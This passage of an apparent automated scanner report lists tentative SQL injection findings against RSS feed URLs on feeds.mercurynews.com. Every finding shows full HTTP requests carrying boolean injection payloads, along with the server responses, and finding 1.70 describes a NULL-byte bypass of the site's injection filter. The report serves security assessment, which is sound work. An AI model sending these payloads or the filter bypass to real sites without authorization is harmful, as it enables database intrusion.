Request 2

GET /mngi/rss/CustomRssServlet/56839771848%20or%201%3d2--%20/200783.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:40 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.63. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200784.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200784.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:49 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200784.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:50 GMT
Date: Tue, 07 Dec 2010 23:20:50 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.64. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200785.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200785.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14698078'%20or%201%3d1--%20 and 14698078'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi14698078'%20or%201%3d1--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:45 GMT
Date: Tue, 07 Dec 2010 23:20:45 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi14698078'%20or%201%3d2--%20/rss/CustomRssServlet/568/200785.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:45 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.65. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10825379'%20or%201%3d1--%20 and 10825379'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi10825379'%20or%201%3d1--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:37 GMT
Date: Tue, 07 Dec 2010 23:20:37 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi10825379'%20or%201%3d2--%20/rss/CustomRssServlet/568/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:38 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.66. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200786.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200786.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:51 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200786.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.67. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200789.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200789.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13847561'%20or%201%3d1--%20 and 13847561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d1--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet13847561'%20or%201%3d2--%20/568/200789.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:46 GMT
Content-Length: 0
Connection: close


1.68. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:03 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.69. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200792.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200792.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200792.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:10 GMT
Content-Length: 0
Connection: close


1.70. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:23 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:23 GMT
Content-Length: 0
Connection: close


1.71. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200795.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200795.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 11124167%20or%201%3d1--%20 and 11124167%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d1--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:27 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56811124167%20or%201%3d2--%20/200795.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
